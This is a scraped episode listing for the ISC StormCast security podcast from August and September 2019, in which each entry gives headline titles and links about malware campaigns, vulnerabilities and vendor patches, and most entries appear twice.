Popular Android Selfie Apps Act as Adware https://www.wandera.com/mobile-security/google-play-adware/ Wireshark Update https://www.wireshark.org/docs/relnotes/wireshark-3.0.5.html Harbor Privilege Escalation https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097/
9/23/20195 minutes, 29 seconds
Episode Artwork

ISC StormCast for Monday, September 23rd 2019

Popular Android Selfie Apps Act as Adware https://www.wandera.com/mobile-security/google-play-adware/ Wireshark Update https://www.wireshark.org/docs/relnotes/wireshark-3.0.5.html Harbor Privilege Escalation https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097/
9/23/20195 minutes, 29 seconds
Episode Artwork

ISC StormCast for Friday, September 20th 2019

Agent Tesla https://isc.sans.edu/forums/diary/Agent+Tesla+Trojan+Abusing+Corporate+Email+Accounts/25336/ Apple Updates https://support.apple.com/en-us/HT201222 https://developer.apple.com/documentation/safari_release_notes/safari_13_release_notes SAMBA 4.11 Released https://www.samba.org/samba/history/samba-4.11.0.html GitHub Security Updates https://github.blog/2019-09-18-securing-software-together/
9/20/20195 minutes, 8 seconds
Episode Artwork

ISC StormCast for Friday, September 20th 2019

Agent Tesla https://isc.sans.edu/forums/diary/Agent+Tesla+Trojan+Abusing+Corporate+Email+Accounts/25336/ Apple Updates https://support.apple.com/en-us/HT201222 https://developer.apple.com/documentation/safari_release_notes/safari_13_release_notes SAMBA 4.11 Released https://www.samba.org/samba/history/samba-4.11.0.html GitHub Security Updates https://github.blog/2019-09-18-securing-software-together/
9/20/20195 minutes, 8 seconds
Episode Artwork

ISC StormCast for Thursday, September 19th 2019

Analyzing a Current Emotet Sample https://isc.sans.edu/forums/diary/Emotet+malspam+is+back/25330/ Windows Defender "Scan Now" Failed Bug Fix https://www.bleepingcomputer.com/news/microsoft/windows-defender-antivirus-scans-broken-after-new-update/ https://borncity.com/win/2019/09/18/defender-antimalware-version-4-18-1908-7-released/ QEMU Vulnerablity https://www.openwall.com/lists/oss-security/2019/09/17/1 VMWare Vulnerabilty https://blogs.vmware.com/security/2019/09/amd-display-driver-security-updates-address-cve-2019-5685.html New CWE Top 25 Released https://cwe.mitre.org/top25/archive/2019/2019_cwe_top25.html
9/19/20196 minutes, 16 seconds
Episode Artwork

ISC StormCast for Thursday, September 19th 2019

Analyzing a Current Emotet Sample https://isc.sans.edu/forums/diary/Emotet+malspam+is+back/25330/ Windows Defender "Scan Now" Failed Bug Fix https://www.bleepingcomputer.com/news/microsoft/windows-defender-antivirus-scans-broken-after-new-update/ https://borncity.com/win/2019/09/18/defender-antimalware-version-4-18-1908-7-released/ QEMU Vulnerablity https://www.openwall.com/lists/oss-security/2019/09/17/1 VMWare Vulnerabilty https://blogs.vmware.com/security/2019/09/amd-display-driver-security-updates-address-cve-2019-5685.html New CWE Top 25 Released https://cwe.mitre.org/top25/archive/2019/2019_cwe_top25.html
9/19/20196 minutes, 16 seconds
Episode Artwork

ISC StormCast for Wednesday, September 18th 2019

Investigating Gaps in Windows Event Logs https://isc.sans.edu/forums/diary/Investigating+Gaps+in+your+Windows+Event+Logs/25328/ SOHOpelesly Broken 2 https://www.securityevaluators.com/whitepaper/sohopelessly-broken-2/ HP Printer Privacy https://robertheaton.com/2019/09/15/hp-printers-send-data-on-what-you-print-back-to-hp/
9/18/20195 minutes, 52 seconds
Episode Artwork

ISC StormCast for Wednesday, September 18th 2019

Investigating Gaps in Windows Event Logs https://isc.sans.edu/forums/diary/Investigating+Gaps+in+your+Windows+Event+Logs/25328/ SOHOpelesly Broken 2 https://www.securityevaluators.com/whitepaper/sohopelessly-broken-2/ HP Printer Privacy https://robertheaton.com/2019/09/15/hp-printers-send-data-on-what-you-print-back-to-hp/
9/18/20195 minutes, 52 seconds
Episode Artwork

ISC StormCast for Tuesday, September 17th 2019

Encrypted Sextortion https://isc.sans.edu/forums/diary/Encrypted+Sextortion+PDFs/25324/ SimJacker https://www.adaptivemobile.com/blog/simjacker-next-generation-spying-over-mobile LastPass Password Leak https://bugs.chromium.org/p/project-zero/issues/detail?id=1930 Microsoft Extends EoL For Exchange Server 2010 https://techcommunity.microsoft.com/t5/Exchange-Team-Blog/Microsoft-Extending-End-of-Support-for-Exchange-Server-2010-to/ba-p/753591
9/17/20196 minutes, 36 seconds
Episode Artwork

ISC StormCast for Tuesday, September 17th 2019

Encrypted Sextortion https://isc.sans.edu/forums/diary/Encrypted+Sextortion+PDFs/25324/ SimJacker https://www.adaptivemobile.com/blog/simjacker-next-generation-spying-over-mobile LastPass Password Leak https://bugs.chromium.org/p/project-zero/issues/detail?id=1930 Microsoft Extends EoL For Exchange Server 2010 https://techcommunity.microsoft.com/t5/Exchange-Team-Blog/Microsoft-Extending-End-of-Support-for-Exchange-Server-2010-to/ba-p/753591
9/17/20196 minutes, 36 seconds
Episode Artwork

ISC StormCast for Monday, September 16th 2019

Rig Exploit Kit Delivering VBScript https://isc.sans.edu/forums/diary/Rig+Exploit+Kit+Delivering+VBScript/25318/ Pentesters Arrested During Physical Access Pentest https://arstechnica.com/information-technology/2019/09/check-the-scope-pen-testers-nabbed-jailed-in-iowa-courthouse-break-in-attempt/ iOS Lock Screen Unlock Vulnerability https://www.theregister.co.uk/2019/09/12/apples_ios_lock_workaround/
9/16/20196 minutes, 10 seconds
Episode Artwork

ISC StormCast for Monday, September 16th 2019

Rig Exploit Kit Delivering VBScript https://isc.sans.edu/forums/diary/Rig+Exploit+Kit+Delivering+VBScript/25318/ Pentesters Arrested During Physical Access Pentest https://arstechnica.com/information-technology/2019/09/check-the-scope-pen-testers-nabbed-jailed-in-iowa-courthouse-break-in-attempt/ iOS Lock Screen Unlock Vulnerability https://www.theregister.co.uk/2019/09/12/apples_ios_lock_workaround/
9/16/20196 minutes, 10 seconds
Episode Artwork

ISC StormCast for Wednesday, September 11th 2019

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+September+2019+Patch+Tuesday/25310/ Adobe Patches https://helpx.adobe.com/security.html Intel SSH Side Channel Vulnerability https://www.vusec.net/projects/netcat/ https://www.cs.vu.nl/~herbertb/download/papers/netcat_sp20.pdf
9/11/20195 minutes, 29 seconds
Episode Artwork

ISC StormCast for Wednesday, September 11th 2019

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+September+2019+Patch+Tuesday/25310/ Adobe Patches https://helpx.adobe.com/security.html Intel SSH Side Channel Vulnerability https://www.vusec.net/projects/netcat/ https://www.cs.vu.nl/~herbertb/download/papers/netcat_sp20.pdf
9/11/20195 minutes, 29 seconds
Episode Artwork

ISC StormCast for Tuesday, September 10th 2019

Firefox to Enable DNS over HTTPs by Default in September https://blog.mozilla.org/futurereleases/2019/09/06/whats-next-in-making-dns-over-https-the-default/ Telegram Fixes Privacy Bug https://www.inputzero.io/2019/09/telegram-privacy-fails-again.html PsiXBot Uses DoH https://www.proofpoint.com/us/threat-insight/post/psixbot-now-using-google-dns-over-https-and-possible-new-sexploitation-module
9/10/20196 minutes, 26 seconds
Episode Artwork

ISC StormCast for Tuesday, September 10th 2019

Firefox to Enable DNS over HTTPs by Default in September https://blog.mozilla.org/futurereleases/2019/09/06/whats-next-in-making-dns-over-https-the-default/ Telegram Fixes Privacy Bug https://www.inputzero.io/2019/09/telegram-privacy-fails-again.html PsiXBot Uses DoH https://www.proofpoint.com/us/threat-insight/post/psixbot-now-using-google-dns-over-https-and-possible-new-sexploitation-module
9/10/20196 minutes, 26 seconds
Episode Artwork

ISC StormCast for Monday, September 9th 2019

Unidentified Scanning Activity Likely Associated with Mirai/Successors https://isc.sans.edu/forums/diary/Unidentified+Scanning+Activity/25304/ Bluekeep Exploit Now in Metasploit https://blog.rapid7.com/2019/09/06/initial-metasploit-exploit-module-for-bluekeep-cve-2019-0708/ How to Remove GMail Calendar Spam https://support.google.com/calendar/answer/6084018?co=GENIE.Platform%3DDesktop&hl=en Exim SNI TLS Vulnerability https://exim.org/static/doc/security/CVE-2019-15846.txt
9/9/20194 minutes, 49 seconds
Episode Artwork

ISC StormCast for Monday, September 9th 2019

Unidentified Scanning Activity Likely Associated with Mirai/Successors https://isc.sans.edu/forums/diary/Unidentified+Scanning+Activity/25304/ Bluekeep Exploit Now in Metasploit https://blog.rapid7.com/2019/09/06/initial-metasploit-exploit-module-for-bluekeep-cve-2019-0708/ How to Remove GMail Calendar Spam https://support.google.com/calendar/answer/6084018?co=GENIE.Platform%3DDesktop&hl=en Exim SNI TLS Vulnerability https://exim.org/static/doc/security/CVE-2019-15846.txt
9/9/20194 minutes, 49 seconds
Episode Artwork

ISC StormCast for Wednesday, September 4th 2019

Tricky Link Retrieves Trick Bot https://isc.sans.edu/forums/diary/Guest+Diary+Tricky+LNK+points+to+TrickBot/25290/ Supermicro Virtual USB Vulnerability https://eclypsium.com/2019/09/03/usbanywhere-bmc-vulnerability-opens-servers-to-remote-attack/ Facebook Free Basics Key Used to Sign Unrelated Android Apps https://www.androidpolice.com/2019/08/29/cryptographic-key-used-to-sign-one-of-facebooks-android-apps-compromised/
9/4/20195 minutes, 59 seconds
Episode Artwork

ISC StormCast for Wednesday, September 4th 2019

Tricky Link Retrieves Trick Bot https://isc.sans.edu/forums/diary/Guest+Diary+Tricky+LNK+points+to+TrickBot/25290/ Supermicro Virtual USB Vulnerability https://eclypsium.com/2019/09/03/usbanywhere-bmc-vulnerability-opens-servers-to-remote-attack/ Facebook Free Basics Key Used to Sign Unrelated Android Apps https://www.androidpolice.com/2019/08/29/cryptographic-key-used-to-sign-one-of-facebooks-android-apps-compromised/
9/4/20195 minutes, 59 seconds
Episode Artwork

ISC StormCast for Tuesday, September 3rd 2019

Malware Installs Node.js https://isc.sans.edu/forums/diary/Malware+Dropping+a+Local+Nodejs+Instance/25284/ Dovecot and PigeonHole Vulnerability https://www.openwall.com/lists/oss-security/2019/08/28/3 Cloudflare Workers Spreading Malware https://medium.com/@marcelx/threat-actor-behind-astaroth-is-now-using-cloudflare-workers-to-bypass-your-security-solutions-2c658d08f4c
9/3/20194 minutes, 42 seconds
Episode Artwork

ISC StormCast for Tuesday, September 3rd 2019

Malware Installs Node.js https://isc.sans.edu/forums/diary/Malware+Dropping+a+Local+Nodejs+Instance/25284/ Dovecot and PigeonHole Vulnerability https://www.openwall.com/lists/oss-security/2019/08/28/3 Cloudflare Workers Spreading Malware https://medium.com/@marcelx/threat-actor-behind-astaroth-is-now-using-cloudflare-workers-to-bypass-your-security-solutions-2c658d08f4c
9/3/20194 minutes, 42 seconds
Episode Artwork

ISC StormCast for Monday, September 2nd 2019

iOS Exploits in the Wild https://googleprojectzero.blogspot.com/2019/08/a-very-deep-dive-into-ios-exploit.html Twitter CEO's Twitter Account Hijacked https://twitter.com/TwitterComms/status/1167528672523210752
9/2/20195 minutes, 18 seconds
Episode Artwork

ISC StormCast for Monday, September 2nd 2019

iOS Exploits in the Wild https://googleprojectzero.blogspot.com/2019/08/a-very-deep-dive-into-ios-exploit.html Twitter CEO's Twitter Account Hijacked https://twitter.com/TwitterComms/status/1167528672523210752
9/2/20195 minutes, 18 seconds
Episode Artwork

ISC StormCast for Friday, August 30th 2019

Malware Samples Compiling Their Next Stage On PremiseMalware Compiling Itself; https://isc.sans.edu/forums/diary/Malware+Samples+Compiling+Their+Next+Stage+on+Premise/25278/ CERT-Bund Attempts to Notify Users of Vulnerable Home Automation Systems https://www.heise.de/security/meldung/CERT-Bund-warnt-vor-offenen-Smarthome-Systemen-4509977.html French Authorities Shut Down Coinminer Botnet https://decoded.avast.io/janvojtesek/putting-an-end-to-retadup-a-malicious-worm-that-infected-hundreds-of-thousands/
8/30/20196 minutes, 24 seconds
Episode Artwork

ISC StormCast for Friday, August 30th 2019

Malware Samples Compiling Their Next Stage On PremiseMalware Compiling Itself; https://isc.sans.edu/forums/diary/Malware+Samples+Compiling+Their+Next+Stage+on+Premise/25278/ CERT-Bund Attempts to Notify Users of Vulnerable Home Automation Systems https://www.heise.de/security/meldung/CERT-Bund-warnt-vor-offenen-Smarthome-Systemen-4509977.html French Authorities Shut Down Coinminer Botnet https://decoded.avast.io/janvojtesek/putting-an-end-to-retadup-a-malicious-worm-that-infected-hundreds-of-thousands/
8/30/20196 minutes, 24 seconds
Episode Artwork

ISC StormCast for Thursday, August 29th 2019

Open Redirects: A Small But Very Common Vulnerability https://isc.sans.edu/forums/diary/Guest+Diary+Open+Redirect+A+Small+But+Very+Common+Vulnerability/25276/ CamScanner Malicious Download Component https://securelist.com/dropper-in-google-play/92496/ Ares ADB Botnet https://www.wootcloud.com/blogs/ars_botnet.html Cisco REST API Container for IOS XE Authentication Bypass https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190828-iosxe-rest-auth-bypass
8/29/20195 minutes, 55 seconds
Episode Artwork

ISC StormCast for Thursday, August 29th 2019

Open Redirects: A Small But Very Common Vulnerability https://isc.sans.edu/forums/diary/Guest+Diary+Open+Redirect+A+Small+But+Very+Common+Vulnerability/25276/ CamScanner Malicious Download Component https://securelist.com/dropper-in-google-play/92496/ Ares ADB Botnet https://www.wootcloud.com/blogs/ars_botnet.html Cisco REST API Container for IOS XE Authentication Bypass https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190828-iosxe-rest-auth-bypass
8/29/20195 minutes, 55 seconds
Episode Artwork

ISC StormCast for Wednesday, August 28th 2019

Is it "Safe" To Require TLS 1.2 for Email https://isc.sans.edu/forums/diary/Is+it+Safe+to+Require+TLS+12+for+EMail/25270/ Android Trojan Infects Tens of Thousands of Devices in 4 Months https://www.bleepingcomputer.com/news/security/android-trojan-infects-tens-of-thousands-of-devices-in-4-months/ LYCEUM Threat Group Targeting Middle East https://www.secureworks.com/blog/lyceum-takes-center-stage-in-middle-east-campaign
8/28/20196 minutes, 40 seconds
Episode Artwork

ISC StormCast for Wednesday, August 28th 2019

Is it "Safe" To Require TLS 1.2 for Email https://isc.sans.edu/forums/diary/Is+it+Safe+to+Require+TLS+12+for+EMail/25270/ Android Trojan Infects Tens of Thousands of Devices in 4 Months https://www.bleepingcomputer.com/news/security/android-trojan-infects-tens-of-thousands-of-devices-in-4-months/ LYCEUM Threat Group Targeting Middle East https://www.secureworks.com/blog/lyceum-takes-center-stage-in-middle-east-campaign
8/28/20196 minutes, 40 seconds
Episode Artwork

ISC StormCast for Tuesday, August 27th 2019

Apple Patches Jailbreak Vulnerability https://support.apple.com/en-us/HT210549 Scanning for Pulse Secure VPN Endpoints https://badpackets.net/over-14500-pulse-secure-vpn-endpoints-vulnerable-to-cve-2019-11510/ Emotet is Back https://www.bleepingcomputer.com/news/security/emotet-botnet-is-back-servers-active-across-the-world/
8/27/20194 minutes, 55 seconds
Episode Artwork

ISC StormCast for Tuesday, August 27th 2019

Apple Patches Jailbreak Vulnerability https://support.apple.com/en-us/HT210549 Scanning for Pulse Secure VPN Endpoints https://badpackets.net/over-14500-pulse-secure-vpn-endpoints-vulnerable-to-cve-2019-11510/ Emotet is Back https://www.bleepingcomputer.com/news/security/emotet-botnet-is-back-servers-active-across-the-world/
8/27/20194 minutes, 55 seconds
Episode Artwork

ISC StormCast for Monday, August 26th 2019

Simple Mimikatz And RDPWrapper Dropper https://isc.sans.edu/forums/diary/Simple+Mimikatz+RDPWrapper+Dropper/25262/ Malware Impersonating IRS https://www.irs.gov/newsroom/security-summit-warns-of-new-irs-impersonation-email-scam-reminds-taxpayers-the-irs-does-not-send-unsolicited-emails Instagram Phishing with 2FA Codes https://nakedsecurity.sophos.com/2019/08/23/instagram-phishing-uses-2fa-as-a-lure/ GitHub Adding WebAuthn Support https://www.theregister.co.uk/2019/08/23/github_upgrades_its_twofactor_authentication_with_webauthn_support/ Lenovo Solution Center Privilege Escalation https://www.pentestpartners.com/security-blog/privesc-in-lenovo-solution-centre-10-minutes-later/
8/26/20195 minutes, 22 seconds
Episode Artwork

ISC StormCast for Monday, August 26th 2019

Simple Mimikatz And RDPWrapper Dropper https://isc.sans.edu/forums/diary/Simple+Mimikatz+RDPWrapper+Dropper/25262/ Malware Impersonating IRS https://www.irs.gov/newsroom/security-summit-warns-of-new-irs-impersonation-email-scam-reminds-taxpayers-the-irs-does-not-send-unsolicited-emails Instagram Phishing with 2FA Codes https://nakedsecurity.sophos.com/2019/08/23/instagram-phishing-uses-2fa-as-a-lure/ GitHub Adding WebAuthn Support https://www.theregister.co.uk/2019/08/23/github_upgrades_its_twofactor_authentication_with_webauthn_support/ Lenovo Solution Center Privilege Escalation https://www.pentestpartners.com/security-blog/privesc-in-lenovo-solution-centre-10-minutes-later/
8/26/20195 minutes, 22 seconds
Episode Artwork

ISC StormCast for Friday, August 23rd 2019

Steam Zero Days and Bug Bounty Controversy https://www.theregister.co.uk/2019/08/22/valve_bug_bounty_steam_u_turn/ bb-builder malicious npm Package https://blog.reversinglabs.com/blog/the-npm-package-that-walked-away-with-all-your-passwords Phishers Customize Branded Outlook 365 Login Pages https://www.bleepingcomputer.com/news/security/phishing-attacks-scrape-branded-microsoft-365-login-pages/
8/23/20195 minutes, 49 seconds
Episode Artwork

ISC StormCast for Friday, August 23rd 2019

Steam Zero Days and Bug Bounty Controversy https://www.theregister.co.uk/2019/08/22/valve_bug_bounty_steam_u_turn/ bb-builder malicious npm Package https://blog.reversinglabs.com/blog/the-npm-package-that-walked-away-with-all-your-passwords Phishers Customize Branded Outlook 365 Login Pages https://www.bleepingcomputer.com/news/security/phishing-attacks-scrape-branded-microsoft-365-login-pages/
8/23/20195 minutes, 49 seconds
Episode Artwork

ISC StormCast for Thursday, August 22nd 2019

KAPE vs. Commando VM: Red vs. Blue https://isc.sans.edu/forums/diary/KAPE+Kroll+Artifact+Parser+and+Extractor/25258/ Attacks against Exposed Sphinx Servers https://www.bsi.bund.de/EN/Topics/IT-Crisis-Management/CERT-Bund/CERT-Reports/HOWTOs/Open-Sphinx-Server/open-Sphinx-server_node.html Cisco Patches https://tools.cisco.com/security/center/publicationListing.x?product=Cisco&sort=-day_sir&limit=50#~Vulnerabilities Newly Registered Domains Most Dangerous https://unit42.paloaltonetworks.com/newly-registered-domains-malicious-abuse-by-bad-actors/
8/22/20195 minutes, 38 seconds
Episode Artwork

ISC StormCast for Thursday, August 22nd 2019

KAPE vs. Commando VM: Red vs. Blue https://isc.sans.edu/forums/diary/KAPE+Kroll+Artifact+Parser+and+Extractor/25258/ Attacks against Exposed Sphinx Servers https://www.bsi.bund.de/EN/Topics/IT-Crisis-Management/CERT-Bund/CERT-Reports/HOWTOs/Open-Sphinx-Server/open-Sphinx-server_node.html Cisco Patches https://tools.cisco.com/security/center/publicationListing.x?product=Cisco&sort=-day_sir&limit=50#~Vulnerabilities Newly Registered Domains Most Dangerous https://unit42.paloaltonetworks.com/newly-registered-domains-malicious-abuse-by-bad-actors/
8/22/20195 minutes, 38 seconds
Episode Artwork

ISC StormCast for Wednesday, August 21st 2019

Guildma Malware is Now Using Facebook and YouTube as Update Channel https://isc.sans.edu/forums/diary/Guildma+malware+is+now+accessing+Facebook+andYouTube+to+keep+uptodate/25222/ Supply Chain Issues: rest-client ruby gem backdoored https://www.theregister.co.uk/2019/08/20/ruby_gem_hacked/
8/21/20195 minutes, 39 seconds
Episode Artwork

ISC StormCast for Wednesday, August 21st 2019

Guildma Malware is Now Using Facebook and YouTube as Update Channel https://isc.sans.edu/forums/diary/Guildma+malware+is+now+accessing+Facebook+andYouTube+to+keep+uptodate/25222/ Supply Chain Issues: rest-client ruby gem backdoored https://www.theregister.co.uk/2019/08/20/ruby_gem_hacked/
8/21/20195 minutes, 39 seconds
Episode Artwork

ISC StormCast for Tuesday, August 20th 2019

iOS 12.4 Jailbreak Released after Reindruced Vulnerability form 12.2 https://github.com/pwn20wndstuff/Undecimus/releases SHA2-Signed Updates for Windows Not Available with Symantec Endpoint Protection https://support.symantec.com/us/en/article.tech255857.html Attacking and Downgrading Bluetooth Key Negotiation https://knobattack.com
8/20/20195 minutes, 32 seconds
Episode Artwork

ISC StormCast for Tuesday, August 20th 2019

iOS 12.4 Jailbreak Released after Reindruced Vulnerability form 12.2 https://github.com/pwn20wndstuff/Undecimus/releases SHA2-Signed Updates for Windows Not Available with Symantec Endpoint Protection https://support.symantec.com/us/en/article.tech255857.html Attacking and Downgrading Bluetooth Key Negotiation https://knobattack.com
8/20/20195 minutes, 32 seconds
Episode Artwork

ISC StormCast for Monday, August 19th 2019

Large Number of VoIP System Vulnerabilities Released https://www.sit.fraunhofer.de/en/cve/ Confidential Company Documents Leaked in Public Sandboxes https://blog.cylab.co/2019/08/16/confidential-company-documents-exposed-in-public-sandboxes/ https://www.sit.fraunhofer.de/en/news-events/latest/press-releases/details/news-article/show/gefahr-uebers-telefon/ Trend Micro Password Manager DLL Hijacking https://esupport.trendmicro.com/en-us/home/pages/technical-support/1123396.aspx Firefox Password Manager May Leak Passwords https://www.mozilla.org/en-US/security/advisories/mfsa2019-24/#CVE-2019-11733
8/19/20195 minutes, 4 seconds
Episode Artwork

ISC StormCast for Monday, August 19th 2019

Large Number of VoIP System Vulnerabilities Released https://www.sit.fraunhofer.de/en/cve/ Confidential Company Documents Leaked in Public Sandboxes https://blog.cylab.co/2019/08/16/confidential-company-documents-exposed-in-public-sandboxes/ https://www.sit.fraunhofer.de/en/news-events/latest/press-releases/details/news-article/show/gefahr-uebers-telefon/ Trend Micro Password Manager DLL Hijacking https://esupport.trendmicro.com/en-us/home/pages/technical-support/1123396.aspx Firefox Password Manager May Leak Passwords https://www.mozilla.org/en-US/security/advisories/mfsa2019-24/#CVE-2019-11733
8/19/20195 minutes, 4 seconds
Episode Artwork

ISC StormCast for Friday, August 16th 2019

Analysis of a Spearphishing Maldoc https://isc.sans.edu/forums/diary/Analysis+of+a+Spearphishing+Maldoc/25242/ IoT Security Stagnation https://securityledger.com/2019/08/huge-survey-of-firmware-finds-no-security-gains-in-15-years/ Kaspersky Insecurity https://www.heise.de/ct/artikel/Kasper-Spy-Kaspersky-Anti-Virus-puts-users-at-risk-4496138.html
8/16/20196 minutes, 21 seconds
Episode Artwork

ISC StormCast for Friday, August 16th 2019

Analysis of a Spearphishing Maldoc https://isc.sans.edu/forums/diary/Analysis+of+a+Spearphishing+Maldoc/25242/ IoT Security Stagnation https://securityledger.com/2019/08/huge-survey-of-firmware-finds-no-security-gains-in-15-years/ Kaspersky Insecurity https://www.heise.de/ct/artikel/Kasper-Spy-Kaspersky-Anti-Virus-puts-users-at-risk-4496138.html
8/16/20196 minutes, 21 seconds
Episode Artwork

ISC StormCast for Thursday, August 15th 2019

MedusaHTTP Malware https://isc.sans.edu/forums/diary/Recent+example+of+MedusaHTTP+malware/25234/ Cryptominer uses DuckDNS for C&C https://www.varonis.com/blog/monero-cryptominer/ Intel NUC Vulnerabilities https://www.intel.com/content/www/us/en/security-center/default.html HTTP/2 Vulnerabilities https://github.com/Netflix/security-bulletins/blob/master/advisories/third-party/2019-002.md
8/15/20196 minutes, 4 seconds
Episode Artwork

ISC StormCast for Thursday, August 15th 2019

MedusaHTTP Malware https://isc.sans.edu/forums/diary/Recent+example+of+MedusaHTTP+malware/25234/ Cryptominer uses DuckDNS for C&C https://www.varonis.com/blog/monero-cryptominer/ Intel NUC Vulnerabilities https://www.intel.com/content/www/us/en/security-center/default.html HTTP/2 Vulnerabilities https://github.com/Netflix/security-bulletins/blob/master/advisories/third-party/2019-002.md
8/15/20196 minutes, 4 seconds
Episode Artwork

ISC StormCast for Wednesday, August 14th 2019

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/August+2019+Microsoft+Patch+Tuesday/25236/ Adobe Patches https://helpx.adobe.com/security.html Windows Text Services Vulnerabilities https://googleprojectzero.blogspot.com/2019/08/down-rabbit-hole.html#ftnt2
8/14/20195 minutes, 23 seconds
Episode Artwork

ISC StormCast for Wednesday, August 14th 2019

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/August+2019+Microsoft+Patch+Tuesday/25236/ Adobe Patches https://helpx.adobe.com/security.html Windows Text Services Vulnerabilities https://googleprojectzero.blogspot.com/2019/08/down-rabbit-hole.html#ftnt2
8/14/20195 minutes, 23 seconds
Episode Artwork

ISC StormCast for Tuesday, August 13th 2019

Malicious DAA Attachments https://isc.sans.edu/forums/diary/Malicious+DAA+Attachments/25230/ SQLLite Exploits https://research.checkpoint.com/select-code_execution-from-using-sqlite/ Printer Vulnerabilities https://www.defcon.org/html/defcon-27/dc-27-speakers.html#Romero https://www.nccgroup.trust/us/our-research/technical-advisory-multiple-vulnerabilities-in-xerox-printers/?research=Technical+advisories
8/13/20195 minutes, 42 seconds
Episode Artwork

ISC StormCast for Tuesday, August 13th 2019

Malicious DAA Attachments https://isc.sans.edu/forums/diary/Malicious+DAA+Attachments/25230/ SQLLite Exploits https://research.checkpoint.com/select-code_execution-from-using-sqlite/ Printer Vulnerabilities https://www.defcon.org/html/defcon-27/dc-27-speakers.html#Romero https://www.nccgroup.trust/us/our-research/technical-advisory-multiple-vulnerabilities-in-xerox-printers/?research=Technical+advisories
8/13/20195 minutes, 42 seconds
Episode Artwork

ISC StormCast for Monday, August 12th 2019

100% JavaScript Phishing Page https://isc.sans.edu/forums/diary/100+JavaScript+Phishing+Page/25220/ Vulnerabilities in DSLR Cameras https://research.checkpoint.com/say-cheese-ransomware-ing-a-dslr-camera/ https://global.canon/en/support/security/d-camera.html Turning Tesla into Surveilance Platform https://github.com/tevora-threat/scout Basic Electron Framework Exploitation https://www.contextis.com/en/blog/basic-electron-framework-exploitation
8/12/20195 minutes, 28 seconds
Episode Artwork

ISC StormCast for Monday, August 12th 2019

100% JavaScript Phishing Page https://isc.sans.edu/forums/diary/100+JavaScript+Phishing+Page/25220/ Vulnerabilities in DSLR Cameras https://research.checkpoint.com/say-cheese-ransomware-ing-a-dslr-camera/ https://global.canon/en/support/security/d-camera.html Turning Tesla into Surveilance Platform https://github.com/tevora-threat/scout Basic Electron Framework Exploitation https://www.contextis.com/en/blog/basic-electron-framework-exploitation
8/12/20195 minutes, 28 seconds
Episode Artwork

ISC StormCast for Friday, August 9th 2019

Kubernetes Security Audit Published https://github.com/kubernetes/community/blob/master/wg-security-audit/findings/Kubernetes%20Final%20Report.pdf https://www.cncf.io/blog/2019/08/06/open-sourcing-the-kubernetes-security-audit/ Apple Expands Bug Bounty https://www.blackhat.com/us-19/briefings/schedule/index.html#behind-the-scenes-of-ios-and-mac-security-17220 https://www.forbes.com/sites/thomasbrewster/2019/08/08/apple-confirms-1-million-reward-for-hackers-who-find-serious-iphone-vulnerabilities/ 0-Day Privilege Escalation in Steam Client https://amonitoring.ru/article/steamclient-0day/ Actual Sextortion Trojan https://www.welivesecurity.com/2019/08/08/varenyky-spambot-campaigns-france/
8/9/20196 minutes, 27 seconds
Episode Artwork

ISC StormCast for Friday, August 9th 2019

Kubernetes Security Audit Published https://github.com/kubernetes/community/blob/master/wg-security-audit/findings/Kubernetes%20Final%20Report.pdf https://www.cncf.io/blog/2019/08/06/open-sourcing-the-kubernetes-security-audit/ Apple Expands Bug Bounty https://www.blackhat.com/us-19/briefings/schedule/index.html#behind-the-scenes-of-ios-and-mac-security-17220 https://www.forbes.com/sites/thomasbrewster/2019/08/08/apple-confirms-1-million-reward-for-hackers-who-find-serious-iphone-vulnerabilities/ 0-Day Privilege Escalation in Steam Client https://amonitoring.ru/article/steamclient-0day/ Actual Sextortion Trojan https://www.welivesecurity.com/2019/08/08/varenyky-spambot-campaigns-france/
8/9/20196 minutes, 27 seconds
Episode Artwork

ISC StormCast for Thursday, August 8th 2019

AT&T Insiders Bribed to Obtain Unlock Codes https://www.justice.gov/usao-wdwa/press-release/file/1191031/download Older RDP Vulnerability Can be Used for HyperV VM Escape https://www.microsoft.com/security/blog/2019/08/07/a-case-study-in-industry-collaboration-poisoned-rdp-vulnerability-disclosure-and-response/ Cisco Patches Smart Switch 220 Vulnerabilities https://tools.cisco.com/security/center/publicationListing.x Firefox for Android Supporting WebAuthn https://blog.mozilla.org/security/2019/08/05/web-authentication-in-firefox-for-android/
8/8/20196 minutes, 31 seconds
Episode Artwork

ISC StormCast for Thursday, August 8th 2019

AT&T Insiders Bribed to Obtain Unlock Codes https://www.justice.gov/usao-wdwa/press-release/file/1191031/download Older RDP Vulnerability Can be Used for HyperV VM Escape https://www.microsoft.com/security/blog/2019/08/07/a-case-study-in-industry-collaboration-poisoned-rdp-vulnerability-disclosure-and-response/ Cisco Patches Smart Switch 220 Vulnerabilities https://tools.cisco.com/security/center/publicationListing.x Firefox for Android Supporting WebAuthn https://blog.mozilla.org/security/2019/08/05/web-authentication-in-firefox-for-android/
8/8/20196 minutes, 31 seconds
Episode Artwork

ISC StormCast for Wednesday, August 7th 2019

Corporate IoT Used in Intrusion https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/ New Spectre Variant: SWAPGS https://www.bitdefender.com/business/swapgs-attack.html New WPA3 Weaknesses https://wpa3.mathyvanhoef.com/#new
8/7/20196 minutes, 15 seconds
Episode Artwork

ISC StormCast for Wednesday, August 7th 2019

Corporate IoT Used in Intrusion https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/ New Spectre Variant: SWAPGS https://www.bitdefender.com/business/swapgs-attack.html New WPA3 Weaknesses https://wpa3.mathyvanhoef.com/#new
8/7/20196 minutes, 15 seconds
Episode Artwork

ISC StormCast for Tuesday, August 6th 2019

Sexploitation E-Mail: Where did the winnings go https://isc.sans.edu/forums/diary/Sextortion+Follow+the+Money+The+Final+Chapter/25204/ VMWare Update https://www.vmware.com/security/advisories/VMSA-2019-0012.html Android Update Fixes Qualcom Bug https://source.android.com/security/bulletin/2019-08-01.html https://blade.tencent.com/en/advisories/qualpwn/
